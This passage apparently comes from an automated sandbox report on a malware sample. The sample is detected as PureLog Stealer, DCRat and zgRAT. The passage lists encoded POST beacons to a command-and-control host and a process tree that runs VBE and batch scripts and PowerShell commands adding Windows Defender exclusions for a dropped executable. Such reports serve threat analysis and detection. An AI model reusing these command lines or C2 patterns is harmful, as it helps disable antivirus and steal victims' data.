                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:35 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            142192.168.2.45014937.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:38.048398018 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:54:38.399200916 CET1016OUTData Raw: 56 50 5a 59 53 5c 50 5f 5a 5f 52 51 54 5a 5b 52 55 5d 59 5e 51 56 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VPZYS\P_Z_RQTZ[RU]Y^QVRYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/?(?X*:>=\3;8_"?)>-%< 7%9'X$.Q-
                                                                                            Nov 5, 2024 23:54:38.860486984 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:38.936009884 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:36 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            143192.168.2.45015037.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:39.059478045 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1012
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:39.417610884 CET1012OUTData Raw: 53 53 5f 5f 53 5b 55 5e 5a 5f 52 51 54 5a 5b 5a 55 50 59 5c 51 5e 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SS__S[U^Z_RQTZ[ZUPY\Q^R\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%]-/=?(Y(;>96>&]%;8_7))=/-?#Q-%'X$.Q-6
                                                                                            Nov 5, 2024 23:54:39.870655060 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:39.939196110 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:37 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            144192.168.2.45015137.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:40.061315060 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:40.414921045 CET1024OUTData Raw: 53 51 5f 5e 56 5f 55 5a 5a 5f 52 51 54 53 5b 5e 55 53 59 5b 51 53 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SQ_^V_UZZ_RQTS[^USY[QSRXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%_8?=<(7>#4Z*:===088_"/?'.54'%&9'X$.Q-
                                                                                            Nov 5, 2024 23:54:40.882237911 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:40.951447964 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:38 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            145192.168.2.45015237.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:41.078499079 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:41.430407047 CET1024OUTData Raw: 56 5f 5a 5f 56 58 55 5f 5a 5f 52 51 54 5d 5b 5a 55 51 59 5a 51 56 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V_Z_VXU_Z_RQT][ZUQYZQVR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&-<>V+ ]+ +)*"=.=%+7"?(X7-C,]4$2]')'X$.Q-
                                                                                            Nov 5, 2024 23:54:41.881203890 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:41.958250999 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:39 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            146192.168.2.45015337.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:42.096406937 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:42.446157932 CET1016OUTData Raw: 53 55 5a 5d 56 56 50 5a 5a 5f 52 51 54 5a 5b 53 55 50 59 5f 51 5e 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZ]VVPZZ_RQTZ[SUPY_Q^RZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,*W<+<_(;)===$? !+>Y9&8 :^')'X$.Q-
                                                                                            Nov 5, 2024 23:54:42.924674034 CET25INHTTP/1.1 100 Continue


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            147192.168.2.45015537.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:42.925092936 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:43.274169922 CET1024OUTData Raw: 53 52 5a 5a 56 5e 55 5f 5a 5f 52 51 54 5e 5b 5c 55 51 59 5a 51 56 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SRZZV^U_Z_RQT^[\UQYZQVRYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%\,/!+8?>:?-&'+4-( .'!'\%'X$.Q-6
                                                                                            Nov 5, 2024 23:54:43.736643076 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:43.808334112 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:41 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            148192.168.2.45015437.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:42.925092936 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:43.274171114 CET1284OUTData Raw: 56 56 5a 5f 53 5c 50 58 5a 5f 52 51 54 5f 5b 53 55 52 59 58 51 57 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VVZ_S\PXZ_RQT_[SURYXQWRXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,+;(?##>\)^?=:]'#"?(>4.0]4'9%'X$.Q-2
                                                                                            Nov 5, 2024 23:54:43.747227907 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:43.826075077 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:41 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 23 07 28 3a 32 11 26 3b 2c 1b 3d 2e 21 13 3c 30 3f 5b 2f 1c 34 13 3d 20 30 59 29 5e 3c 55 34 3f 2c 06 35 54 35 5c 23 1c 3f 1d 28 3b 21 5f 05 1d 39 5a 24 17 3f 0c 2a 54 2e 16 28 27 02 05 26 20 2c 45 2a 05 04 5b 23 04 22 1f 25 3d 22 01 25 54 3f 53 28 24 2e 02 2c 3f 3b 1c 32 2a 2a 57 09 16 20 1c 25 30 3f 5f 3e 31 06 02 30 00 31 10 25 3a 2f 53 29 12 3b 1f 23 24 36 59 2a 23 2b 5e 36 37 3e 58 33 2a 2a 45 31 00 01 1b 28 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: #(:2&;,=.!<0?[/4= 0Y)^<U4?,5T5\#?(;!_9Z$?*T.('& ,E*[#"%="%T?S($.,?;2**W %0?_>101%:/S);#$6Y*#+^67>X3**E1("&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            149192.168.2.45015637.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:43.945889950 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:54:44.289855957 CET1024OUTData Raw: 56 57 5f 58 56 5e 50 52 5a 5f 52 51 54 59 5b 5e 55 56 59 57 51 5e 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VW_XV^PRZ_RQTY[^UVYWQ^R\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/?2+++4Z*=?>%$$X#Y2).0968_ "Y2'X$.Q-*
                                                                                            Nov 5, 2024 23:54:44.788541079 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:44.868148088 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:17:52:02
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Users\user\Desktop\3AAyq819Vy.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\3AAyq819Vy.exe"
                                                                                            Imagebase:0xca0000
                                                                                            File size:2'041'114 bytes
                                                                                            MD5 hash:059DD6A8CB2D31871BB82DBB158965FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1725117408.0000000004D46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1724034780.00000000063AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:17:52:03
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe"
                                                                                            Imagebase:0x4e0000
                                                                                            File size:147'456 bytes
                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:17:52:16
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\hyperContaineragent\CYWN6IDJqLBtl0YjSrMSw1hYURgrvXzRLx.bat" "
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:17:52:16
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:17:52:16
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\hyperContaineragent/Bridgecommon.exe"
                                                                                            Imagebase:0xf70000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1861446770.0000000000F72000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1943082141.0000000013491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 83%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:17:52:19
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline"
                                                                                            Imagebase:0x7ff6afa50000
                                                                                            File size:2'759'232 bytes
                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:10
                                                                                            Start time:17:52:19
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:17:52:19
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4DA.tmp" "c:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMP"
                                                                                            Imagebase:0x7ff60d6c0000
                                                                                            File size:52'744 bytes
                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:27
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe'
                                                                                            Imagebase:0x7ff788560000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:28
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe'
                                                                                            Imagebase:0x7ff788560000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:29
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:30
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe'
                                                                                            Imagebase:0x7ff788560000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:31
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\nFQRHbQjcuhfqIAubZpdQD.exe'
                                                                                            Imagebase:0x7ff788560000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:32
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:33
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe'
                                                                                            Imagebase:0x7ff788560000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:34
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
